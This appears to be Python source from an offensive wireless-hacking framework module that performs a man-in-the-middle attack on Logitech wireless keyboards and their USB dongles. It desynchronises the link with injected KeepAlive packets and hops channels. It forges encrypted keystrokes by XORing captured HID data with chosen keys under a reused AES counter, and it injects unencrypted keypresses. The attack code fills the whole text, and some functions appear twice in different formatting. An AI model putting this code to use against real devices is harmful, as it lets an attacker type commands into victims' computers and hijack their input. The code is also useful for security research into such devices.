def addLogitechDelay(self,duration=1000): keystrokes = [] number = int(duration / 10.0) for _ in range(number): keystrokes.append(esb.ESBLogitechKeepAlivePacket(address=self.target,timeout=1200)) keystrokes.append(wireless.WaitPacket(time=10.0/1000.0)) return keystrokes
def addLogitechKeystroke(self,
locale="fr",
key="a",
ctrl=False,
alt=False,
gui=False,
shift=False):
keystrokes = []
keystrokeUnencryptedPayload = esb.LogitechKeystroke(locale=locale,
key=key,
ctrl=ctrl,
alt=alt,
gui=gui,
shift=shift).data
forgedPayload = bytes([
self.lastKeyRelease.hidData[i] ^ keystrokeUnencryptedPayload[i]
for i in range(len(self.lastKeyRelease.hidData))
])
io.info("Forged payload: " + forgedPayload.hex())
keystrokes.append(
esb.ESBLogitechEncryptedKeystrokePacket(
address=self.target,
aesCounter=self.lastKeyRelease.aesCounter,
unknown=self.lastKeyRelease.unknown,
hidData=forgedPayload))
keystrokes.append(wireless.WaitPacket(time=12 / 1000.0))
keystrokes.append(
esb.ESBLogitechKeepAlivePacket(address=self.target, timeout=1200))
keystrokes.append(
esb.ESBLogitechEncryptedKeystrokePacket(
address=self.target,
aesCounter=self.lastKeyRelease.aesCounter,
unknown=self.lastKeyRelease.unknown,
hidData=self.lastKeyRelease.hidData))
return keystrokes
def addLogitechKeystroke(self,locale="fr",key="a",ctrl=False, alt=False, gui=False,shift=False): keystrokes = [] keystrokes.append(esb.ESBLogitechUnencryptedKeyPressPacket(address=self.target,locale=locale,key=key,ctrl=ctrl,alt=alt,gui=gui,shift=shift)) keystrokes.append(wireless.WaitPacket(time=12/1000.0)) keystrokes.append(esb.ESBLogitechKeepAlivePacket(address=self.target,timeout=1200)) keystrokes.append(esb.ESBLogitechUnencryptedKeyReleasePacket(address=self.target)) return keystrokes
def deviceToDongle(self, pkt):
if pkt.payload != b"" and pkt.payload != b"\x0f\x0f\x0f\x0f" and pkt.payload != b"\xFF" * 32:
self.lastFrame = utils.now()
if self.stage == ESBMitmStage.DESYNC:
self.deviceEmitter.sendp(
esb.ESBLogitechKeepAlivePacket(address=self.args["TARGET"],
timeout=1))
pkt.show()
io.info("Injecting malicious KeepAlive...")
self.injectionCount += 1
if self.injectionCount >= 20:
self.injectionCount = 0
io.info("Changing dongle channel !")
self.dongleReceiver.setChannel(self.pickChannel())
elif self.stage == ESBMitmStage.ACTIVE_MITM:
self.dongleEmitter.clear()
if isinstance(pkt, esb.ESBLogitechMousePacket):
self.logitechMousePacket(pkt)
elif isinstance(pkt, esb.ESBLogitechSetTimeoutPacket):
self.logitechSetTimeoutPacket(pkt)
elif isinstance(pkt,
esb.ESBLogitechUnencryptedKeyReleasePacket):
self.logitechUnencryptedKeyReleasePacket(pkt)
elif isinstance(pkt, esb.ESBLogitechUnencryptedKeyPressPacket):
self.logitechUnencryptedKeyPressPacket(pkt)
elif isinstance(pkt, esb.ESBLogitechKeepAlivePacket):
self.logitechKeepAlivePacket(pkt)
elif isinstance(pkt, esb.ESBLogitechEncryptedKeystrokePacket):
self.logitechEncryptedKeystrokePacket(pkt)
elif isinstance(pkt, esb.ESBLogitechMultimediaKeyPressPacket):
self.logitechMultimediaKeyPressPacket(pkt)
elif isinstance(pkt,
esb.ESBLogitechMultimediaKeyReleasePacket):
self.logitechMultimediaKeyReleasePacket(pkt)
self.dongleEmitter.sendp(
esb.ESBLogitechKeepAlivePacket(address=self.args["TARGET"],
timeout=1200))
def run(self):
self.deviceReceiver = self.getReceiver(
interface=self.args["INTERFACE1"])
self.deviceEmitter = self.getEmitter(interface=self.args["INTERFACE1"])
self.dongleReceiver = self.getReceiver(
interface=self.args["INTERFACE2"])
self.dongleEmitter = self.getEmitter(interface=self.args["INTERFACE2"])
if self.checkCapabilities():
self.deviceReceiver.enterSnifferMode(self.args["TARGET"])
self.dongleReceiver.enterSnifferMode(self.args["TARGET"])
self.deviceReceiver.onEvent("*", self.deviceToDongle)
self.dongleReceiver.onEvent("*", self.dongleToDevice)
if self.loadScenario():
io.info("Scenario loaded !")
self.startScenario()
io.info("Entering SCAN stage ...")
self.setStage(ESBMitmStage.SCAN)
while not self.deviceReceiver.scan(self.channels):
io.info("Looking for dongle ...")
utils.wait(seconds=0.01)
io.success("Dongle found !")
io.info("Entering DESYNC stage ...")
self.setStage(ESBMitmStage.DESYNC)
dongleChannel = self.pickChannel()
self.dongleReceiver.setChannel(dongleChannel)
self.deviceReceiver.enableAutoAck()
while self.stage != ESBMitmStage.STOP:
io.info("Transmitting ACK frames for device on channel " +
str(self.deviceReceiver.getChannel()) + " ...")
io.info(
"Transmitting KeepAlive frames for dongle on channel " +
str(self.dongleReceiver.getChannel()) + " ...")
keepAlives = []
keepAlives.append(
esb.ESBLogitechKeepAlivePacket(address=self.args["TARGET"],
timeout=1200))
keepAlives.append(wireless.WaitPacket(time=10.0 / 1000.0))
while self.stage == ESBMitmStage.DESYNC or self.stage == ESBMitmStage.ACTIVE_MITM:
self.dongleEmitter.sendp(*keepAlives)
utils.wait(seconds=0.001)
if self.dongleEmitter.getChannel(
) == self.deviceEmitter.getChannel():
self.dongleEmitter.setChannel(self.pickChannel())
self.ackCount = 0
self.injectionCount = 0
self.setStage(ESBMitmStage.DESYNC)
break
if self.lastFrame is not None and utils.now(
) - self.lastFrame > utils.integerArg(
self.args["TIMEOUT"]):
io.fail("Device lost, terminating ...")
self.setStage(ESBMitmStage.STOP)
break
if self.scenarioEnabled:
self.endScenario()
return self.ok()
else:
io.fail("Interfaces provided (" + str(self.args["INTERFACE1"]) +
", " + str(self.args["INTERFACE2"]) +
") are not able to run this module.")
return self.nok()